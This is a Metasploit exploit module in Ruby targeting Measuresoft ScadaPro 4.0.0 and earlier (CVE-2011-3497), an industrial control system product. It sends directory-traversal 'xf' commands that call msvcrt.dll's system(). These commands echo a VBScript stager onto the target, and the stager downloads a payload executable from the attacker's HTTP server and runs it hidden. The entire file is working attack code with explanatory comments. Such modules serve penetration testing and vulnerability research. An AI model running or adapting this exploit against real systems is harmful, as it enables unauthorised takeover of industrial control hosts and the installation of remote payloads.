##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
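class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Two-letter VBScript reserved words.  The stager uses random two-letter
  # identifiers, and VBScript identifiers are case-insensitive, so any of these
  # (in any case) would make the generated script fail to run.
  VBS_RESERVED = %w[as do if in is me on or to].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Measuresoft ScadaPro Remote Command Execution',
        'Description' => %q{
          This module allows remote attackers to execute arbitrary commands on the
          affected system by abusing via Directory Traversal attack when using the
          'xf' command (execute function). An attacker can execute system() from
          msvcrt.dll to upload a backdoor and gain remote code execution. This
          vulnerability affects version 4.0.0 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Luigi Auriemma', # Initial discovery/poc
          'mr_me <steventhomasseeley[at]gmail.com>', # msf
          'TecR0c <tecr0c[at]tecninja.net>', # msf
        ],
        'References' => [
          [ 'CVE', '2011-3497'],
          [ 'OSVDB', '75490'],
          [ 'BID', '49613'],
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
          # Vendor statement disputing the report (it seemed pretty accurate to us ;)
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
        ],
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Platform' => 'win',
        'Targets' => [
          # No version-specific offsets are needed: the bug is a command
          # injection through the service's own 'xf' function, not memory corruption.
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-09-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The .vbs stager and the 2nd-stage .exe are written under
          # C:\Windows\Temp and are never removed by this module.
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(11234),
        # Prefix of the URL the target fetches the 2nd stage from; the random
        # "<name>.exe" is appended directly, so a value without a trailing "/"
        # simply produces a longer file name (on_request_uri only looks for ".exe").
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ]
    )
  end

  # Picks a random two-letter VBScript variable name that is neither a
  # reserved word nor (case-insensitively) the same as any name in `taken`.
  # Two colliding names would make the second `Set` clobber the first object.
  #
  # @param taken [Array<String>] names already used in the script
  # @return [String] a safe identifier
  def vbs_var_name(taken = [])
    loop do
      name = rand_text_alpha(2)
      lower = name.downcase
      next if VBS_RESERVED.include?(lower)
      next if taken.any? { |t| t.downcase == lower }

      return name
    end
  end

  # Builds the cmd.exe command that writes the VBScript stager on the target.
  # The returned value is not VBScript itself but an `echo <script> >> <file>`
  # command line, meant to be run through msvcrt's system(); it leaves the
  # script in "#{@temp_folder}/#{stager_name}".
  #
  # A .vbs is used (rather than writing an .exe directly via the service's
  # 'wF' command) because the original authors hit a size limit on the amount
  # of data that command will write to disk.
  #
  # When the target later runs the script it (1) GETs http://<url> with
  # Microsoft.XMLHTTP, (2) writes the response body to
  # "#{@temp_folder}/#{@payload_name}.exe" through ADODB.Stream (Type=1 is
  # binary, SaveToFile mode 2 overwrites) and (3) starts that exe with
  # WScript.Shell.Run, window style 0 (hidden).  Both files stay on disk.
  #
  # @param url [String] "host:port/path" of the 2nd stage served by this module (no scheme)
  # @param stager_name [String] file name of the .vbs to create under @temp_folder
  # @return [String] the command line to execute on the target
  def build_vbs(url, stager_name)
    http = vbs_var_name             # VBScript variable for the XMLHTTP object
    stream = vbs_var_name([http])   # VBScript variable for the ADODB.Stream
    tmp = "#{@temp_folder}/#{stager_name}"
    exe = "#{@temp_folder}/#{@payload_name}.exe"

    # Built as a fresh string (no in-place <<) so it also works under
    # frozen string literals.
    [
      "echo Set #{http} = CreateObject(\"Microsoft.XMLHTTP\") ",
      ": #{http}.open \"GET\",\"http://#{url}\",False : #{http}.send",
      ": Set #{stream} = CreateObject(\"ADODB.Stream\") ",
      ": #{stream}.Open : #{stream}.Type=1 ",
      ": #{stream}.Write #{http}.responseBody ",
      ": #{stream}.SaveToFile \"#{exe}\",2 ",
      ": CreateObject(\"WScript.Shell\").Run \"#{exe}\",0 >> #{tmp}"
    ].join
  end

  # HTTP server callback: serves the 2nd-stage executable to the stager.
  # Any request whose URI contains ".exe" gets a freshly generated payload
  # exe; everything else is ignored (no response body is sent).
  #
  # @param cli [Rex::Proto::Http::Client] the connecting client
  # @param request [Rex::Proto::Http::Request] the incoming request
  # @return [nil]
  def on_request_uri(cli, request)
    return unless request.uri =~ /\.exe/

    print_status("Sending 2nd stage payload")
    payload = regenerate_payload(cli)
    return if payload.nil?

    data = generate_payload_exe({ :code => payload.encoded })
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
    nil
  end

  # Runs the attack:
  #   1. builds the URL of the 2nd stage served by this module's HTTP server,
  #   2. sends two 'xf' commands to the ScadaPro service, each traversing out
  #      of the service directory to call msvcrt.dll!system(): the first
  #      echoes the VBScript stager into C:\Windows\Temp, the second starts it,
  #   3. starts the payload handler and then lets the HTTP server run (super).
  #
  # The target must be able to reach SRVHOST:SRVPORT over plain HTTP; with
  # SRVHOST 0.0.0.0 the address advertised is whatever local interface would
  # route to 50.50.50.50, which may not be reachable from the target
  # (e.g. behind NAT) — set SRVHOST explicitly in that case.
  #
  # @return [void]
  def exploit
    # In order to save binary data to the file system the payload is written
    # to a .vbs file and executed from there (see build_vbs).
    @payload_name = rand_text_alpha(4)
    @temp_folder = "C:/Windows/Temp"

    lhost =
      if datastore['SRVHOST'] == '0.0.0.0'
        Rex::Socket.source_address('50.50.50.50')
      else
        datastore['SRVHOST']
      end

    # Interpolate instead of appending with <<: the original appended to
    # `lhost` in place, which mutated the SRVHOST datastore string itself
    # whenever SRVHOST was not 0.0.0.0.
    payload_src = "#{lhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

    stager_name = "#{rand_text_alpha(6)}.vbs"
    stager = build_vbs(payload_src, stager_name)

    # Fixed traversal depth from the service's working directory back to
    # %SystemRoot%\system32; presumably matches the default install layout
    # (the target list calls it universal) — verify on a non-default install.
    path = "..\\..\\..\\..\\..\\windows\\system32"

    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

    print_status("Sending 1st stage payload...")

    # ensure: the original never disconnected if a put/get raised mid-exchange.
    begin
      connect
      sock.get_once
      sock.put(createvbs)
      sock.get_once
      sock.put(download_execute)
      handler
    ensure
      disconnect
    end

    super
  end
end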